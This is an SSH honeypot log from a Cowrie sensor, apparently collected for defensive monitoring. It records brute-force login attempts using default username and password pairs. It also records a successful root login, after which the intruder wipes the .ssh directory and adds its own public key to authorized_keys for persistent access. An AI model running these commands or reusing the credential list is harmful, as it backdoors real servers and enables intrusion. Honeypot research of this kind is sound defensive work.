{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:57.867563Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:57.868667Z","src_ip":"212.227.125.160","session":"aaa43b2d68b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36000,"dst_ip":"1.2.3.4","dst_port":22,"session":"557d9c910216","protocol":"ssh","message":"New connection: 212.227.125.160:36000 (1.2.3.4:22) [session: 557d9c910216]","sensor":"my-vps","timestamp":"2025-08-26T21:43:02.772418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:02.773355Z","src_ip":"212.227.125.160","session":"557d9c910216"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:02.839732Z","src_ip":"212.227.125.160","session":"557d9c910216"}
{"eventid":"cowrie.login.failed","username":"sem6","password":"sem6","message":"login attempt [sem6/sem6] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:03.019223Z","src_ip":"212.227.125.160","session":"557d9c910216"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:04.073657Z","src_ip":"212.227.125.160","session":"557d9c910216"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59618,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af6ee20bd23","protocol":"ssh","message":"New connection: 212.227.125.160:59618 (1.2.3.4:22) [session: 0af6ee20bd23]","sensor":"my-vps","timestamp":"2025-08-26T21:43:08.246267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:08.247307Z","src_ip":"212.227.125.160","session":"0af6ee20bd23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:08.309169Z","src_ip":"212.227.125.160","session":"0af6ee20bd23"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:08.816877Z","src_ip":"212.227.125.160","session":"0af6ee20bd23"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:09.883000Z","src_ip":"212.227.125.160","session":"0af6ee20bd23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55002,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf36d8d235f0","protocol":"ssh","message":"New connection: 212.227.125.160:55002 (1.2.3.4:22) [session: cf36d8d235f0]","sensor":"my-vps","timestamp":"2025-08-26T21:43:14.865725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:14.934595Z","src_ip":"212.227.125.160","session":"cf36d8d235f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:14.935365Z","src_ip":"212.227.125.160","session":"cf36d8d235f0"}
{"eventid":"cowrie.login.failed","username":"devadmin","password":"devadmin","message":"login attempt [devadmin/devadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:15.213537Z","src_ip":"212.227.125.160","session":"cf36d8d235f0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:16.289600Z","src_ip":"212.227.125.160","session":"cf36d8d235f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50392,"dst_ip":"1.2.3.4","dst_port":22,"session":"e98067e98266","protocol":"ssh","message":"New connection: 212.227.125.160:50392 (1.2.3.4:22) [session: e98067e98266]","sensor":"my-vps","timestamp":"2025-08-26T21:43:20.434018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:20.440187Z","src_ip":"212.227.125.160","session":"e98067e98266"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:20.505499Z","src_ip":"212.227.125.160","session":"e98067e98266"}
{"eventid":"cowrie.login.failed","username":"username","password":"username","message":"login attempt [username/username] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:20.999945Z","src_ip":"212.227.125.160","session":"e98067e98266"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:22.046310Z","src_ip":"212.227.125.160","session":"e98067e98266"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45776,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d6c3773f905","protocol":"ssh","message":"New connection: 212.227.125.160:45776 (1.2.3.4:22) [session: 3d6c3773f905]","sensor":"my-vps","timestamp":"2025-08-26T21:43:25.966379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:25.972382Z","src_ip":"212.227.125.160","session":"3d6c3773f905"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:26.023446Z","src_ip":"212.227.125.160","session":"3d6c3773f905"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:26.235272Z","src_ip":"212.227.125.160","session":"3d6c3773f905"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:27.282025Z","src_ip":"212.227.125.160","session":"3d6c3773f905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41162,"dst_ip":"1.2.3.4","dst_port":22,"session":"7feeee6b2510","protocol":"ssh","message":"New connection: 212.227.125.160:41162 (1.2.3.4:22) [session: 7feeee6b2510]","sensor":"my-vps","timestamp":"2025-08-26T21:43:31.408978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:31.447731Z","src_ip":"212.227.125.160","session":"7feeee6b2510"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:31.505428Z","src_ip":"212.227.125.160","session":"7feeee6b2510"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:32.273051Z","src_ip":"212.227.125.160","session":"7feeee6b2510"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:33.637544Z","src_ip":"212.227.125.160","session":"7feeee6b2510"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36548,"dst_ip":"1.2.3.4","dst_port":22,"session":"10e2742c53b2","protocol":"ssh","message":"New connection: 212.227.125.160:36548 (1.2.3.4:22) [session: 10e2742c53b2]","sensor":"my-vps","timestamp":"2025-08-26T21:43:37.985435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:43:37.986639Z","src_ip":"212.227.125.160","session":"10e2742c53b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:43:38.040817Z","src_ip":"212.227.125.160","session":"10e2742c53b2"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:43:38.179363Z","src_ip":"212.227.125.160","session":"10e2742c53b2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:39.226277Z","src_ip":"212.227.125.160","session":"10e2742c53b2"}
{"eventid":"cowrie.session.connect","src_ip":"46.148.229.196","src_port":47072,"dst_ip":"1.2.3.4","dst_port":22,"session":"23ca1ce864bc","protocol":"ssh","message":"New connection: 46.148.229.196:47072 (1.2.3.4:22) [session: 23ca1ce864bc]","sensor":"my-vps","timestamp":"2025-08-26T21:43:42.832381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:43:42.835266Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:43:42.871672Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.login.success","username":"root","password":"123Abc!@#","message":"login attempt [root/123Abc!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.059410Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:43:43.196979Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.197735Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.198873Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.236164Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:43:43.329083Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.329798Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.367966Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.368914Z","src_ip":"46.148.229.196","session":"23ca1ce864bc"}
{"eventid":"cowrie.session.connect","src_ip":"46.148.229.196","src_port":47076,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c72cd74bf4a","protocol":"ssh","message":"New connection: 46.148.229.196:47076 (1.2.3.4:22) [session: 9c72cd74bf4a]","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.402949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:43:43.404014Z","src_ip":"46.148.229.196","session":"9c72cd74bf4a"}
